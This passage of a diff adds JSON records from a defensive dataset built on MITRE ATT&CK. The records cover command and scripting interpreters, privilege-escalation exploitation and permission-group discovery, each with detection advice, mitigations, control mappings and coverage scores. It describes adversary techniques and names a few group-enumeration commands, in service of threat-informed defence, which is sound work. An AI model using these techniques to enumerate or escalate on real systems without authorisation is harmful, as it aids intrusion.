+        "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.",
+        "url": "https://attack.mitre.org/techniques/T1059/003",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1059",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.3761904761904762,
+        "adjusted_score": 0.3761904761904762,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "2.7"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1059.004",
+        "name": "Command and Scripting Interpreter: Unix Shell",
+        "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.",
+        "url": "https://attack.mitre.org/techniques/T1059/004",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ",
+        "platforms": [
+            "Linux",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1059",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.36190476190476184,
+        "adjusted_score": 0.36190476190476184,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "2.7"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1059.005",
+        "name": "Command and Scripting Interpreter: Visual Basic",
+        "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.",
+        "url": "https://attack.mitre.org/techniques/T1059/005",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1059",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
+            },
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 0.5238095238095238,
+        "adjusted_score": 0.5238095238095238,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.8",
+            "9.3",
+            "9.6",
+            "9.7",
+            "10.1",
+            "10.2",
+            "10.7",
+            "13.2",
+            "13.7",
+            "18.3",
+            "18.5",
+            "16.10"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SC-18",
+            "SI-10",
+            "SI-16",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1059.006",
+        "name": "Command and Scripting Interpreter: Python",
+        "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.",
+        "url": "https://attack.mitre.org/techniques/T1059/006",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1059",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
+            },
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1033",
+                "name": "Limit Software Installation",
+                "description": "Block users or groups from installing unapproved software.",
+                "url": "https://attack.mitre.org/mitigations/M1033"
+            }
+        ],
+        "cumulative_score": 0.40476190476190477,
+        "adjusted_score": 0.40476190476190477,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.1",
+            "2.2",
+            "2.3",
+            "2.4",
+            "2.5",
+            "2.7",
+            "4.1",
+            "9.7",
+            "10.1",
+            "10.2",
+            "10.7",
+            "13.2",
+            "13.7",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-6",
+            "CM-11",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "SI-10",
+            "SI-16",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1059.007",
+        "name": "Command and Scripting Interpreter: JavaScript",
+        "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).",
+        "url": "https://attack.mitre.org/techniques/T1059/007",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nMonitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1059",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            }
+        ],
+        "cumulative_score": 0.44285714285714284,
+        "adjusted_score": 0.44285714285714284,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "2.7",
+            "4.1",
+            "4.8",
+            "9.3",
+            "9.6",
+            "18.3",
+            "18.5",
+            "16.10"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SC-18",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1059.008",
+        "name": "Command and Scripting Interpreter: Network Device CLI",
+        "description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)",
+        "url": "https://attack.mitre.org/techniques/T1059/008",
+        "tactics": [
+            "Execution"
+        ],
+        "detection": "Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)\n\nConsider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.",
+        "platforms": [
+            "Network"
+        ],
+        "data_sources": [
+            "Command: Command Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1059",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.3380952380952381,
+        "adjusted_score": 0.3380952380952381,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.7",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "12.2",
+            "12.5"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "IA-8",
+            "SI-10",
+            "SI-16",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1068",
+        "name": "Exploitation for Privilege Escalation",
+        "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).",
+        "url": "https://attack.mitre.org/techniques/T1068",
+        "tactics": [
+            "Privilege Escalation"
+        ],
+        "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules)\n\nHigher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.",
+        "platforms": [
+            "Containers",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Driver: Driver Load"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1048",
+                "name": "Application Isolation and Sandboxing",
+                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                "url": "https://attack.mitre.org/mitigations/M1048"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            },
+            {
+                "mid": "M1019",
+                "name": "Threat Intelligence Program",
+                "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.",
+                "url": "https://attack.mitre.org/mitigations/M1019"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.9236483914285714,
+        "adjusted_score": 0.9236483914285714,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "10.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-4",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-10",
+            "RA-5",
+            "SC-18",
+            "SC-2",
+            "SC-26",
+            "SC-29",
+            "SC-3",
+            "SC-30",
+            "SC-35",
+            "SC-39",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-5",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.5714285714285714,
+            "mitigation_score": 0.6,
+            "detection_score": 0.54
+        },
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.00221982
+    },
+    {
+        "tid": "T1069",
+        "name": "Permission Groups Discovery",
+        "description": "Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.",
+        "url": "https://attack.mitre.org/techniques/T1069",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)",
+        "platforms": [
+            "Azure AD",
+            "Containers",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "Group: Group Enumeration",
+            "Group: Group Metadata",
+            "Pod: Pod Metadata",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1069.001",
+                "name": "Permission Groups Discovery: Local Groups",
+                "url": "https://attack.mitre.org/techniques/T1069/001",
+                "description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups.",
+                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+                "mitigations": []
+            },
+            {
+                "tid": "T1069.002",
+                "name": "Permission Groups Discovery: Domain Groups",
+                "url": "https://attack.mitre.org/techniques/T1069/002",
+                "description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n\nCommands such as net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility,  dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.",
+                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+                "mitigations": []
+            },
+            {
+                "tid": "T1069.003",
+                "name": "Permission Groups Discovery: Cloud Groups",
+                "url": "https://attack.mitre.org/techniques/T1069/003",
+                "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.",
+                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.",
+                "mitigations": []
+            }
+        ],
+        "mitigations": [],
+        "cumulative_score": 0.26976355761904763,
+        "adjusted_score": 0.26976355761904763,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.14761904761904762,
+            "detection_score": 0.31
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.02214451
+    },
+    {
+        "tid": "T1069.001",
+        "name": "Permission Groups Discovery: Local Groups",
